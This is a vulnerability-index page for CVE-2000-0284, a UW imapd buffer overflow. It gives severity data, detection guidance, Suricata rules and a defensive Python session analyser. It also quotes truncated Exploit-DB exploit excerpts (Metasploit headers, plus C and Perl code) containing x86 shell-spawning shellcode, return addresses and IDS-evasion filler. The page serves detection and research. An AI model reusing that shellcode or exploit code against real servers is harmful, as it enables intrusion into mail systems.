CVE-2000-0284
Published: 2000-04-16
CVE-2000-0284: Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
Priority: P3 45 · Severity: high, 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 69.48% (99.3rd percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| university_of_washington | imap | — | — |
Detection & IOCs (extracted from the indexed sources)
Shellcode byte patterns seen in the indexed exploits:
- \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
- \x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd\x5f\xc6\x45\xde\x5f
Detection guidance:
- Detect an IMAP LSUB command with a literal argument of 1064 bytes ({1064}), the exact overflow trigger size used by all known exploits for CVE-2000-0284.
- Flag IMAP sessions where an LSUB, LIST, COPY, RENAME, or FIND command is followed immediately by a large literal (>= 1064 bytes); all of these commands are confirmed overflow vectors.
- Alert on an IMAP banner matching 'IMAP4rev1 v12.264', 'IMAP4rev1 v12.261', or '2000.284'; these are the confirmed vulnerable versions.
- Monitor for NOP sled patterns (0x90 repeated) followed by shellcode in IMAP literal data streams on port 143, consistent with stack-based buffer overflow exploitation.
- Detect an IMAP PARTIAL command with an oversized BODY argument containing non-printable/binary data, used as an alternative overflow vector in the TESO exploit.
- Exploitation requires valid IMAP credentials; correlate successful LOGIN events immediately followed by anomalous LSUB/LIST/COPY/RENAME/FIND commands with large literals as a high-fidelity detection pattern.
Caveats:
- Exploitation requires a valid account on the target system; unauthenticated remote exploitation is not possible. Detection rules should account for the mandatory LOGIN step before the malicious command.
- The Metasploit bruteforce target uses a return address range (0xbffffdfc to 0xbfa00000, step 200), so exploit traffic may appear as many repeated LSUB connections with slightly varying payloads rather than a single attempt.
- Bad characters excluded from the payload differ between exploit variants: the original Metasploit module excludes \x00\x0a\x0d, while the updated version also excludes \x2f (forward slash). Signature-based detection must account for both payload encodings.
- Privileges are dropped in imapd before the vulnerable code path is reached, so successful exploitation yields only the privilege level of the authenticated user, not root.
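The detection guidance above can be turned into a small session analyser. The following is an added example written for this page, not code from any of the indexed sources: it walks a captured IMAP session (a constructed list of client/server lines, not real traffic), tracks the mandatory LOGIN step, and flags LSUB/LIST/COPY/RENAME/FIND commands announcing a literal of 1064 bytes or more, NOP sleds inside the literal data, and banners of the versions named above. The command set, the 1064-byte threshold and the banner strings come from the guidance; the 32-byte NOP sled minimum and the sample session are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Commands named as overflow vectors in the CVE-2000-0284 detection guidance.
VULNERABLE_COMMANDS = {"LSUB", "LIST", "COPY", "RENAME", "FIND"}
# Literal size used by the known exploits; anything at or above it is suspicious.
LITERAL_THRESHOLD = 1064
# Banner fragments of the versions reported as vulnerable.
VULNERABLE_BANNERS = (b"IMAP4rev1 v12.264", b"IMAP4rev1 v12.261", b"2000.284")
# Minimum run of 0x90 bytes treated as a NOP sled (assumed value, not from the page).
NOP_SLED_MIN = 32

# "<tag> <COMMAND> ... {<n>}": a command whose last argument is an IMAP literal.
CMD_WITH_LITERAL = re.compile(rb"^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)\b.*\{(?P<size>\d+)\+?\}\s*$")
LOGIN = re.compile(rb"^(?P<tag>\S+)\s+LOGIN\b", re.IGNORECASE)
TAGGED_OK = re.compile(rb"^(?P<tag>\S+)\s+OK\b", re.IGNORECASE)
NOP_SLED = re.compile(rb"\x90{%d,}" % NOP_SLED_MIN)


@dataclass(frozen=True)
class Finding:
    index: int      # position of the offending line within the session
    command: str    # IMAP command involved, or "banner"
    reason: str


def analyse_session(session: list[tuple[str, bytes]]) -> list[Finding]:
    """session is a list of (direction, raw_line) with direction 'C' (client to
    server) or 'S' (server to client). Literal bytes following a {n} announcement
    are expected as the next client entry, after the server's '+' continuation."""
    findings: list[Finding] = []
    login_tags: set[bytes] = set()
    authenticated = False
    just_logged_in = False   # True until the first client command after a LOGIN OK
    pending = None           # command whose literal bytes are still expected

    for i, (direction, raw) in enumerate(session):
        line = raw.rstrip(b"\r\n")

        if direction == "S":
            if any(b in line for b in VULNERABLE_BANNERS):
                findings.append(Finding(i, "banner", "server advertises a known-vulnerable UW imapd version"))
            m = TAGGED_OK.match(line)
            if m and m.group("tag") in login_tags:
                authenticated = True
                just_logged_in = True
            continue

        if pending is not None:
            # This client entry is the literal payload of the previous command.
            cmd, pending = pending, None
            if NOP_SLED.search(line):
                findings.append(Finding(i, cmd, "NOP sled (0x90 run) inside literal data"))
            continue

        m = LOGIN.match(line)
        if m:
            login_tags.add(m.group("tag"))
            just_logged_in = False
            continue

        m = CMD_WITH_LITERAL.match(line)
        if m:
            cmd = m.group("cmd").decode("ascii", "replace").upper()
            size = int(m.group("size"))
            if cmd in VULNERABLE_COMMANDS and size >= LITERAL_THRESHOLD:
                what = "exact exploit literal size" if size == LITERAL_THRESHOLD else "oversized literal"
                if just_logged_in:
                    ctx = "immediately after successful LOGIN"
                elif authenticated:
                    ctx = "in an authenticated session"
                else:
                    ctx = "before any successful LOGIN"
                findings.append(Finding(i, cmd, f"{what} ({size} bytes) {ctx}"))
            pending = cmd
        just_logged_in = False

    return findings


# Constructed sample session modelled on the exploit pattern described above.
SAMPLE_SESSION = [
    ("S", b"* OK imap.example.test IMAP4rev1 v12.264 server ready\r\n"),
    ("C", b"a001 LOGIN alice secret\r\n"),
    ("S", b"a001 OK LOGIN completed\r\n"),
    ("C", b"a002 LSUB \"\" {1064}\r\n"),
    ("S", b"+ Ready for argument\r\n"),
    ("C", b"\x90" * 900 + b"\xeb\x1f\x5e\x89\x76\x08" + b"A" * 158 + b"\r\n"),
    ("C", b"a003 LIST \"\" *\r\n"),
    ("S", b"a003 OK LIST completed\r\n"),
]

# Constructed benign session: same commands, ordinary argument sizes.
BENIGN_SESSION = [
    ("S", b"* OK imap.example.test IMAP4rev1 v2004 server ready\r\n"),
    ("C", b"a001 LOGIN alice secret\r\n"),
    ("S", b"a001 OK LOGIN completed\r\n"),
    ("C", b"a002 LSUB \"\" {5}\r\n"),
    ("S", b"+ Ready for argument\r\n"),
    ("C", b"INBOX\r\n"),
    ("S", b"a002 OK LSUB completed\r\n"),
]

if __name__ == "__main__":
    for f in analyse_session(SAMPLE_SESSION):
        print(f"line {f.index}: {f.command}: {f.reason}")
```

The analyser keys on the literal announcement rather than on the payload bytes, which is why it still fires when an exploit variant changes its bad-character set or return address; the NOP sled check is a secondary signal, since the Perl exploit on this page uses 0x41 rather than 0x90 as filler.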
Suricata: GPL IMAP find overflow attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP find overflow attempt"; flow:established,to_server; content:"FIND"; nocase; isdataat:100,relative; pcre:"/\sFIND\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101904; rev:8; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata: GPL IMAP rename overflow attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP rename overflow attempt"; flow:established,to_server; content:"RENAME"; nocase; isdataat:100,relative; pcre:"/\sRENAME\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101903; rev:9; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB: UoW IMAPd Server - LSUB Buffer Overflow (Metasploit) (exploitdb, 2010-03-26)
---
##
# $Id: imap_uw_lsub.rb 8932 2010-03-26 19:00:23Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
'Author' => [ 'patrick', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8932 $',
'References' =>
[
[ 'CVE', '2000-0284'
Exploit-DB: UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow (exploitdb, 2002-08-01)
---
// source: https://www.securityfocus.com/bid/1110/info
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machi
Exploit-DB: WU-IMAP 2000.287(1-2) - Remote Overflow (exploitdb, 2002-06-25)
---
/* 7350owex- x86/linux WU-IMAP 2000.287(1-2) remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2002
* All Rights Reserved
*
* bug found by scut 2002/06/25
Exploit-DB: IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow (exploitdb, 2001-03-03)
---
/*
* !!! Private !!!
*
* imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
*
* By: SkyLaZarT ( [email protected] ) .aka. Felipe Cerqueira
* Homepage: www.BufferOverflow.Org
* Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
* Antonio Marcelo and Felipe Saraiva
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 1064
#define NOP 0x90
#define RET12261 0xbffff3ec
#define RET12264 0xbffff4e0
#define RET12264ZOOT 0xbffff697
#define RET2000_284 0xbfffebc8
#define INIT(x) bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x))
#define TIMEOUT 20
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46
Exploit-DB: IMAP4rev1 10.190 - Authentication Stack Overflow (exploitdb, 2001-01-19)
---
#!/usr/bin/perl
## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: [email protected] / anno 2000
##
## This is nothing new - just wrote it for fun.
$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
"\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
"\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
"\x2f\x32\x39\x3e\x2f\x43\x38";
$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.
if (@ARGV \n");
exit(1);
}
($target, $offset) = @ARGV;
for ($i = 0; $i < ($len - length($shellcode) - 1
Exploit-DB: University of Washington - imap LSUB Buffer Overflow (Metasploit) (exploitdb, 2000-04-16)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2000-0284' ],
[ 'OSVDB', '12037' ],
[ 'BID', '1110' ],
[ 'URL
Exploit-DB: UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit) (exploitdb, 2000-04-16)
---
source: https://www.securityfocus.com/bid/1110/info
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on t
Exploit-DB: UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit) (exploitdb, 2000-04-16)
---
source: https://www.securityfocus.com/bid/1110/info
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on th
Metasploit: UoW IMAP Server LSUB Buffer Overflow
This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password.
Writeups: no writeups or analysis indexed.
References:
- http://archives.neohapsis.com/archives/bugtraq/2000-04/0074.html
- http://archives.neohapsis.com/archives/bugtraq/2000-04/0085.html
- http://www.securityfocus.com/bid/1110